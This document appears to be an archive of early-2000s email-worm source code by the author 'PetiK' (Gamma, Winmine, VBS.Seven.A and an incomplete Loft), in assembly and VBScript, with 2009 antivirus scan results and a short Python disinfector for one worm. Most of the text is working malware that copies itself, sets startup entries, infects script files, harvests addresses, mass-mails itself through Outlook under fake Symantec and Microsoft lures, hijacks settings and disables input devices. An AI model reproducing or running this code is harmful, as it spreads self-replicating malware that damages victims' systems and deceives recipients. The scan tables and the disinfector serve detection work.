db 'm.Subject = "Message from " & n',0dh,0ah
db 's = "Time : " & time',0dh,0ah
db 's = s & vbCrLf & "Date : " & date',0dh,0ah
db 's = s & vbCrLf & "Organization : " & p',0dh,0ah
db 's = s & vbCrLf & vbCrLf & " I-Worm.Gamma"',0dh,0ah
db 'm.Body = s',0dh,0ah
db 'm.DeleteAfterSubmit=True',0dh,0ah
db 'm.Send',0dh,0ah
db 'w.RegWrite "HKLM\Software\Gamma\", "OK"',0dh,0ah
db 'End If',0dh,0ah
INFOTAILLE equ $-infod

Email dd ?
dd offset Subject
dd offset Message
dd ?
dd offset DateS
dd ?
dd 2
dd offset MelFrom
dd 1
dd offset MelTo
dd 1
dd offset Attach

MelFrom dd ?
dd ?
dd offset MelFrom
dd offset sAddr
dd ?
dd ?

MelTo dd ?
dd 1
dd offset MelTo
dd offset mail_address
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset szOrig
dd ?
dd ?

Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h
Message db "Hi,",0dh,0ah,0dh,0ah
db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. "
db "Here is the version 3.1 .",0dh,0ah
db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, "
db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah
db 09h,09h,"With Regards,",0dh,0ah
db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h
DateS db "06/06/2001",00h
sAddr db "[email protected]",00h

.code
DEBUT:
VERIF:
push 00h
call GetModuleHandleA
push 50
push offset szOrig
push eax
call GetModuleFileNameA

push 50h
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat

push offset szOrig
push offset szCopie
call lstrcmp
test eax,eax
jz MIRC

COPIE:
push 00h
push offset szCopie
push offset szOrig
call CopyFileA

WININI:
push 50
push offset szWinini
call GetWindowsDirectoryA
push offset Winini
push offset szWinini
call lstrcat
push offset szWinini
push offset szCopie
push offset run
push offset windows
call WritePrivateProfileStringA

MESSAGE:
push 1010h
push offset szOrig
push offset TEXTE
push 00h
call MessageBoxA
jmp FIN

MIRC:
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_ALWAYS
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset mirc
call CreateFileA
mov [FileHandle],eax
push 00h
push offset octets
push MIRCTAILLE
push offset mircd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle

C_MIRC:
push 00h
push offset script1
push offset mirc
call CopyFileA
push 00h
push offset script2
push offset mirc
call CopyFileA
push 00h
push offset script3
push offset mirc
call CopyFileA
push 00h
push offset script4
push offset mirc
call CopyFileA

INFO:
push offset DIR
call CreateDirectoryA
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset information
call CreateFileA
cmp eax,-1
je DATE
mov [FileHandle],eax
push 00h
push offset octets
push INFOTAILLE
push offset infod
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
push 01h
push offset infoexec
call WinExec

DATE:
push offset SystemTime
call GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne NET
cmp [SystemTime.wDay],05h
jne NET
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA
push 01h
call SwapMouseButton
jmp NET

PAUSE:
push 60 * 3 * 1000
call Sleep

NET:
push offset symantec
call gethostbyname
test eax,eax
jz PAUSE

TIF:
push offset RegHandle
push KEY_QUERY_VALUE
push 00h
push offset tempnetfile
push HKEY_USERS
call RegOpenKeyExA
test eax,eax
jnz FIN
push 7Fh
push offset szTif
push offset ValueType
push 00h
push offset Value
push [RegHandle]
call RegQueryValueExA

push [RegHandle]
call RegCloseKey

TIFCH:
push offset szTif
call SetCurrentDirectoryA

FFF:
push offset CHERCHE
push offset FICHIER
call FindFirstFileA
cmp eax,-1
je FC
mov [SrchHandle],eax
cHTML:
call HTML
FNF:
push offset CHERCHE
push [SrchHandle]
call FindNextFileA
dec eax
jnz cHTML
FC:
push [SrchHandle]
call FindClose

END_S:
popad

FIN:
push 00h
call ExitProcess

HTML:
pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset CHERCHE.FileName
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1

xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi

push 00h
push ebx
call GetFileSize
xchg eax,ecx
jecxz FERME3
ls_s_m:
call @mt
db 'mailto:'
@mt:
pop edi
l_s_m:
pushad
push 07h
pop ecx
rep cmpsb
popad
je s_m
inc esi
loop l_s_m

FERME3:
push esi
call UnmapViewOfFile
FERME2:
push ebp
call CloseHandle
FERME1:
push ebx
call CloseHandle
popad
ret

s_m:
xor edx,edx
add esi,7
mov edi,offset mail_address
push edi
n_c:
lodsb
cmp al,' '
je s_c
cmp al,'"'
je e_c
cmp al,''''
je e_c
cmp al,'@'
jne o_a
inc edx
o_a:
stosb
jmp n_c
s_c:
inc esi
jmp n_c
e_c:
xor al,al
stosb
pop edi
test edx,edx
je ls_s_m

mapiln:
xor eax,eax
push dword ptr [MAPISession]
push eax
push eax
push eax ; password
push eax ; username
push eax
call MAPILogon
mapism:
xor eax,eax
push eax
push eax
push offset Email
push eax
push word ptr [MAPISession]
call MAPISendMail
mapilf:
xor eax,eax
push eax
push eax
push eax
push dword ptr [MAPISession]
call MAPILogoff

jmp ls_s_m
end DEBUT

File Gamma.exe received on 05.16.2009 11:58:18 (CET)
Antivirus  Version  Last Update  Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.8704
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.09
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!d62f
Avast 4.8.1335.0 2009.05.15 Win32:Gamma
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.C@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.AV.09
Comodo 1157 2009.05.08 Worm.Win32.Petik.C
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Mania
F-Prot 4.4.4.56 2009.05.15 W32/Malware!d62f
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.D@mm
GData 19 2009.05.16 Win32.Petik.C@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.09
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.C@mm
NOD32 4080 2009.05.15 Win32/Petik.C
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 DDoS/Petik.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Gamma.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.g
Sophos 4.41.0 2009.05.16 W32/Gamma
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.D
VBA32 3.12.10.5 2009.05.16 OScope.Dialer.GMHA
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.A
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Gamma.A

Additional information
File size: 8704 bytes
MD5...: 997ae169da2f57e7e48e6862eb70223a
SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1

comment #
Name : I-Worm.Winmine
Author : PetiK
Date : June 12th - June 15th
Size : 6656 bytes
Action : Checks whether the file is run from the SYSTEM folder. If so, it creates a file named "C:\ENVOIE_VBS.vbs" to spread with Outlook :
Subject : Is the work so hard ??
Body : Relax you with the last version of
Otherwise, it copies itself to the SYSTEM folder, alters the load= line in the WIN.INI file so it runs when the computer starts, and displays a message box.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm

DEBUT:
VERIF:
push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA

push 50h
push offset szCopie
callx GetSystemDirectoryA
push offset Copie
push offset szCopie
callx lstrcat
push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz SEND

COPIE:
push 00h
push offset szCopie
push offset szOrig
callx CopyFileA

WININI:
push 50
push offset szWinini
callx GetWindowsDirectoryA
push offset Winini
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
push offset load
push offset windows
callx WritePrivateProfileStringA

MESSAGE:
push 1040h
push offset TITRE
push offset TEXTE
push 00h
callx MessageBoxA
jmp FIN

SEND:
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset vbssend
callx CreateFileA
cmp eax,-1
je GO
mov [FileHandle],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
GO:
push 01h
push offset onyva
callx WinExec

DLL:
push offset dllName
callx LoadLibraryA
test eax,eax
jz DATE
mov hdll,eax
push offset FunctionName
push hdll
callx GetProcAddress
test eax,eax
jz DATE
mov setvalue,eax
REG:
push 08h
push offset start_page
push 01h
push offset start_key
push offset main_s
push HKEY_CURRENT_USER
call [setvalue]
FINDLL:
push [hdll]
callx FreeLibrary

DATE:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
callx MessageBoxA
push 01h
callx SwapMouseButton
push 60 * 5 * 1000
callx Sleep
push EWX_SHUTDOWN
callx ExitWindowsEx

FIN:
push 00h
callx ExitProcess

.data
szCopie db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FileHandle dd ?
octets dd ?
hdll dd ?
setvalue dd ?

Copie db "\WINMINE.EXE",00h
vbssend db "C:\ENVOIE_VBS.vbs",00h
onyva db "wscript C:\ENVOIE_VBS.vbs",00h
Winini db "\\WIN.INI",00h
load db "load",00h
windows db "windows",00h
TITRE db "Winmine - Microsoft Corporation (R)",00h
TEXTE db "The last update of the game ""Winmine"" written by Microsoft Corporation",00h
TITRE2 db "I-Worm.Winmine",00h
TEXTE2 db "By PetiK (c)2001",00h
main_s db "Software\Microsoft\Internet Explorer\Main",00h
start_key db "Start Page",00h
start_page db "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h
dllName db "SHLWAPI.dll",00h
FunctionName db "SHSetValueA",00h
wormname db "I-Worm.Winmine by PetiK",00h
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set A=CreateObject("Outlook.Application")',0dh,0ah
db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah
db 'For Each C In B.AddressLists',0dh,0ah
db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For D=1 To C.AddressEntries.count',0dh,0ah
db 'Set E=C.AddressEntries(D)',0dh,0ah
db 'Set F=A.CreateItem(0)',0dh,0ah
db 'F.To=E.Address',0dh,0ah
db 'F.Subject="Is the work so hard ??"',0dh,0ah
db 'F.Body="Relax you with the last version of

CREATE_NEW equ 00000001h
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
HKEY_CURRENT_USER equ 80000001h
EWX_SHUTDOWN equ 00000001h

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
end DEBUT
end

File Winmine.exe received on 05.10.2009 23:52:01 (CET)
Antivirus  Version  Last Update  Result
a-squared 4.0.0.101 2009.05.10 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.09 Win32/Petik.worm.6656
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.AV.02
Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.10 W32/Malware!cc55
Avast 4.8.1335.0 2009.05.10 Win32:Petik-Winmine
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.10 Generic.Malware.Msp!.4B5A9B45
CAT-QuickHeal 10.00 2009.05.09 -
ClamAV 0.94.1 2009.05.10 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.B
DrWeb 5.0.0.12182 2009.05.10 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 Win32/Petik.6656.C
F-Prot 4.4.4.56 2009.05.10 W32/Malware!cc55
F-Secure 8.0.14470.0 2009.05.09 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.10 W32/Petik!worm
GData 19 2009.05.10 Generic.Malware.Msp!.4B5A9B45
Ikarus T3.1.1.49.0 2009.05.10 Email-Worm.Win32.Petik
K7AntiVirus 7.10.729 2009.05.08 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.10 Email-Worm.Win32.Petik
McAfee 5611 2009.05.10 W32/PetTick@MM
McAfee+Artemis 5611 2009.05.10 -
McAfee-GW-Edition 6.7.6 2009.05.10 Worm.Petik.AV.02
Microsoft 1.4602 2009.05.10 Worm:Win32/Pet_tik.G@mm
NOD32 4063 2009.05.08 Win32/Petik.B
Norman 6.01.05 2009.05.08 W32/Pet_Tick.6656.C
nProtect 2009.1.8.0 2009.05.10 Worm/W32.Petik.6656
Panda 10.0.0.14 2009.05.10 W32/Petik
PCTools 4.4.2.0 2009.05.07 I-Worm.Petik.H
Prevx 3.0 2009.05.10 Medium Risk Malware
Rising 21.28.62.00 2009.05.10 Trojan.WINMINE
Sophos 4.41.0 2009.05.10 W32/Winmine
Sunbelt 3.2.1858.2 2009.05.09 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.10 -
TheHacker 6.3.4.1.324 2009.05.09 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.08 WORM_MINEUP.A
VBA32 3.12.10.4 2009.05.09 Win32.Worm.Petik.8192
ViRobot 2009.5.9.1727 2009.05.09 -
VirusBuster 4.6.5.0 2009.05.10 I-Worm.Petik.H

Additional information
File size: 6656 bytes
MD5...: 23f6db768eacfa01a352a657acb26c9b
SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153

' Name : VBS.Seven.A
' Author : PetiK
' Date : June 16th 2001
' Size : 3626 bytes
' Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs
' and \WINDOWS\TEMP\Lust.vbs. It adds values to the Run key (Envy) and to the
' RunServices key (Lust). When the current day is the 1st, 15th or 30th it adds
' a value to the HKCU Run key (Anger=rundll32 mouse,disable), which disables
' the mouse at each start. When the current day is the 12th or 28th it displays
' a message box and closes Windows when the user clicks "OK".
' When the day is the 14th it displays another message; when the user clicks
' "OK", the worm disables the keyboard.
' When the day is the 5th or 17th, it changes some registry values: when the
' user opens a TXT file, "\WINDOWS\Seven.vbs" starts, and the VBS icon is
' replaced by the TXT icon.
' After that it infects all VBS files it finds on the disk, appending code at
' the end of each file so that \WINDOWS\Seven.vbs runs when the file is run.
' The worm also uses Outlook to spread :
' Subject : What is the seven sins ??
' Body : Look at this file and learn them.
' Attached : Seven.vbs
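A defender-side counterpart to the infection routine described above, added here as an example (it is not part of the archive or of PetiK's code): it recognises the marker line and the three-line loader that the worm's infect() routine writes around each .vbs file and restores the original script. It assumes CRLF line endings, the terminator FileSystemObject.WriteLine produces; file paths are whatever the caller passes in.

```python
"""Detect and clean .vbs files carrying the VBS.Seven.A infection layout.

Added example, not part of the PetiK archive. It relies only on what the
worm's infect() routine writes: the marker line in front of the original
script, the original text, one empty WriteLine, and a three-line loader
that starts \\WINDOWS\\Seven.vbs. CRLF line endings are assumed (the
terminator FileSystemObject.WriteLine produces).
"""
from pathlib import Path
from typing import List, Optional

MARKER = "'VBS.Seven.A"
NL = "\r\n"
# The loader the worm appends; copied from the infection routine.
TRAILER = (
    'Set w=CreateObject("WScript.Shell")',
    'Set f=CreateObject("Scripting.FileSystemObject")',
    'w.run f.GetSpecialFolder(0)&"\\Seven.vbs"',
)


def is_infected(text: str) -> bool:
    """True if line 1 is the marker and the last three lines are the loader."""
    lines = text.split(NL)
    # A WriteLine-terminated file splits into a trailing empty element.
    # Minimum layout: marker, original (possibly empty), three loader lines, "".
    if len(lines) < 6 or lines[0] != MARKER or lines[-1] != "":
        return False
    return tuple(lines[-4:-1]) == TRAILER


def clean(text: str) -> Optional[str]:
    """Return the original script text, or None if the layout does not match."""
    if not is_infected(text):
        return None
    start = text.index(NL) + len(NL)                      # skip the marker line
    trailer_len = sum(len(line) + len(NL) for line in TRAILER)
    body = text[start:len(text) - trailer_len]
    # infect() wrote inf.WriteLine "" right after the original text, so
    # exactly one CRLF separates the original from the loader: drop it.
    if not body.endswith(NL):
        return None
    return body[:-len(NL)]


def clean_file(path: Path) -> bool:
    """Restore one file in place; returns True when a disinfection happened."""
    text = path.read_bytes().decode("latin-1")            # 8-bit scripts of the era
    restored = clean(text)
    if restored is None:
        return False
    path.write_bytes(restored.encode("latin-1"))
    return True


def clean_tree(root: Path) -> List[Path]:
    """Walk root and clean every .vbs file; returns the paths that were fixed."""
    fixed = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() == ".vbs" and clean_file(path):
            fixed.append(path)
    return fixed


if __name__ == "__main__":
    import sys
    for p in clean_tree(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print("cleaned", p)
```

Run it with a directory argument to walk that tree; files whose first line is the marker but whose tail is not the expected loader are left untouched so a partial or tampered infection is not mangled.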
'VBS.Seven.A
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)

SEVEN()
Sub SEVEN()
Set org=fso.GetFile(WScript.ScriptFullname)
org.Copy(win&"\Seven.vbs")
org.Copy(sys&"\Envy.vbs")
org.Copy(tmp&"\Lust.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust")
ws.RegWrite run,sys&"\Envy.vbs"
ws.RegWrite runs,tmp&"\Lust.vbs"
First()
Second()
Third()
Disk()
Send()
End Sub

Sub First()
If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then
run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger")
ws.RegWrite run2,"rundll32 mouse,disable"
End If
End Sub

Sub Second()
If Day(Now)=12 or Day(Now)=28 Then
MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven"
ws.Run "rundll32.exe user.exe,exitwindows"
End If
If Day(Now)=14 Then
MsgBox "The keyboard is on strike !",vbInformation,"Seven"
ws.Run "rundll32 keyboard,disable"
End If
End Sub

Sub Third()
If Day(Now)=5 or Day(Now)=17 Then
bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then
txt=ws.RegRead("HKCR\txtfile\shell\open\command\")
ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt
ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs"
icot=ws.RegRead("HKCR\txtfile\DefaultIcon\")
icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot
Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
end if
End If
End Sub

Sub Disk
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
end If
Next
End Sub

Sub infect(dossier)
Set f=fso.GetFolder(dossier)
Set fc=f.Files
For each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
If (ext="vbs") Then
Set cot=fso.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS.Seven.A" then
cot.Close
Set cot=fso.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=fso.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS.Seven.A"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine "Set w=CreateObject(""WScript.Shell"")"
inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")"
inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs"""
inf.Close
End If
End If
Next
End Sub

Sub list(dossier)
Set f=fso.GetFolder(dossier)
Set sf=f.SubFolders
For each f1 in sf
infect(f1.path)
list(f1.path)
Next
End Sub

Sub Send()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="What is the seven sins ??"
F.Body="Look at this file and learn them."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub

File Seven.vbs received on 05.16.2009 19:29:21 (CET)
Antivirus  Version  Last Update  Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.I
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 VBS/Petik.S@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.9CAAED1A
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.I
ClamAV 0.94.1 2009.05.16 Worm.Petik.I
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 VBS.SillyWorm.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Chism
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.S@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.i
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.I
GData 19 2009.05.16 Generic.ScriptWorm.9CAAED1A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.i
McAfee 5616 2009.05.15 VBS/Chism
McAfee+Artemis 5616 2009.05.15 VBS/Chism
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.I
Microsoft 1.4602 2009.05.16 Virus:VBS/Chism
NOD32 4080 2009.05.15 VBS/Chism
Norman 6.01.05 2009.05.16 VBS/Chism.A@mm
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.I@mm
Panda 10.0.0.14 2009.05.16 VBS/Petik.I
PCTools 4.4.2.0 2009.05.16 VBS.Seven.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik.i
Sophos 4.41.0 2009.05.16 VBS/Seven-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.I-O
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.i
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Seven.A

Additional information
File size: 3626 bytes
MD5...: 8781b9a791c0c144e97a466486f6ef33
SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec

comment #
Name : I-Worm.Loft
Author : PetiK
Date : June 16th - June 22nd
Size : 8704 bytes
Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies itself to this file and alters the run= line in the WIN.INI file so it runs at each start. It also copies itself to \WINDOWS\LOFT_STORY.EXE.
Otherwise, it checks whether the key HKCU\Software\Microsoft\PetiK exists. If it does not, the worm creates the file "Loft.htm" in the StartUp folder. When the user accepts the ActiveX control of this page, it modifies the Internet Explorer start page to download the file ActiveX.vbs. This file sends various information about the computer to three addresses : loftptk@multimania(castaldi), [email protected](vlad14) and [email protected](pk29a).
It displays a message on the 28th of every month and modifies the Internet start page, RegisteredOwner and RegisteredOrganization. It checks whether an Internet connection exists; if not, it retries every five seconds, otherwise it displays a message. It then scans all *.htm* files in "Temporary Internet Files" to find email addresses.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc

DEBUT:
VERIF:
push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA

push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\LOFT.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\LOFT_STORY.EXE"
push offset szCopieb
callx lstrcat

push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz C_PTK

COPIE:
push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopieb
push offset szOrig
callx CopyFileA

WININI:
push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA

MESSAGE:
push 1040h
@pushsz "Loft Story"
@pushsz "I'm fucking the Loft Story"
push 00h
callx MessageBoxA
jmp FIN

C_PTK:
push offset regDisp
push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h
push 00h
@pushsz "Software\Microsoft\PetiK"
push HKEY_CURRENT_USER
callx RegCreateKeyExA
cmp [regDisp],2
je DATE
push [regResu]
callx RegCloseKey

STA_UP:
push offset RegHandle
push 001F0000h ; KEY_QUERY_VALUE
push 00h
@pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
push HKEY_USERS
callx RegOpenKeyExA
test eax,eax
jnz FIN

push offset BufferSize
push offset Buffer
push 00h ;ValueType
push 00h
@pushsz "Startup"
push RegHandle
callx RegQueryValueExA

push [RegHandle]
callx RegCloseKey

CR_HTM:
@pushsz "\Loft.htm"
push offset Buffer
call lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_ALWAYS
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset Buffer
callx CreateFileA
mov [FileHandle],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
jmp DLL

DATE:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],28
jne DLL
SHSET:
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz DLL
mov hdll2,eax
@pushsz "SHSetValueA"
push hdll2
callx GetProcAddress
test eax,eax
jz DLL
mov setvalue,eax
WEB:
push 08h
@pushsz "http://www.loftstory.fr"
push 01h
@pushsz "Start Page"
@pushsz "Software\Microsoft\Internet Explorer\Main"
push HKEY_CURRENT_USER
call [setvalue]
push 08h
@pushsz "LoftStory"
push 01h
@pushsz "RegisteredOrganization"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push HKEY_LOCAL_MACHINE
call [setvalue]
push 08h
@pushsz "Aziz, Kenza, Loanna, etc..."
push 01h
@pushsz "RegisteredOwner"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push HKEY_LOCAL_MACHINE
call [setvalue]
push [hdll2]
callx FreeLibrary
push 40h
@pushsz "I-Worm.LoftStory"
@pushsz "New Worm Internet coded by PetiK (c)2001"
push 00h
callx MessageBoxA

DLL:
@pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov hdll,eax
